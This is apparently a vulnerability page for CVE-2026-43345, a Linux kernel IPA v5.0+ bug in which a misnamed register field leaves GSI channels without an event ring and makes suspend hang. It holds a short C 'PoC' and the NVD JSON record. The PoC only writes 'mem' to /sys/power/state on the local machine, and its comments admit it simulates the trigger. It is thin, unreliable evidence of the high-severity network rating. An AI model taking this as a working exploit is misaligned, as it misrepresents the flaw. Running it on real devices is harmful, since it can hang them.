CVE-2026-43345

/* * PoC for CVE-2026-43345: IPA v5.0+ Event Ring Index DoS * This script attempts to trigger the hang by forcing a suspend state * while the IPA interface is active on a vulnerable kernel. * Note: This requires a vulnerable kernel version and specific hardware. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/reboot.h> int main() { printf("[+] Attempting to trigger IPA hang on vulnerable kernel...\n"); // In a real scenario, network traffic would be generated to load the IPA. // Then a system suspend is triggered. printf("[*] Simulating trigger condition for system suspend...\n"); // On a vulnerable device, the following command would cause the system // to hang indefinitely instead of suspending. system("echo mem > /sys/power/state"); // If the code reaches here, the system is not vulnerable or patched. printf("[-] System did not hang. Vulnerability might be patched.\n"); return 0; }

{"cve": {"id": "CVE-2026-43345", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T14:16:44.547", "lastModified": "2026-05-11T08:16:10.557", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipa: fix event ring index not programmed for IPA v5.0+\n\nFor IPA v5.0+, the event ring index field moved from CH_C_CNTXT_0 to\nCH_C_CNTXT_1. The v5.0 register definition intended to define this\nfield in the CH_C_CNTXT_1 fmask array but used the old identifier of\nERINDEX instead of CH_ERINDEX.\n\nWithout a valid event ring, GSI channels could never signal transfer\ncompletions. This caused gsi_channel_trans_quiesce() to block\nforever in wait_for_completion().\n\nAt least for IPA v5.2 this resolves an issue seen where runtime\nsuspend, system suspend, and remoteproc stop all hanged forever. It\nalso meant the IPA data path was completely non functional."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "references": [{"url": "https://git.kernel.org/stable/c/2bf18b643c4656413f7cfd5615af60a6b4e261da", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/2d2dc166d55148cfcf8ae67b415f8d6d110e6fca", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/34c988bb04cbdf093d2134e179433da49ffcd044", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/56007972c0b1e783ca714d6f1f4d6e66e531d21f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/ae8343a19ccb051d519dbb3a9082ddea9f0551d3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}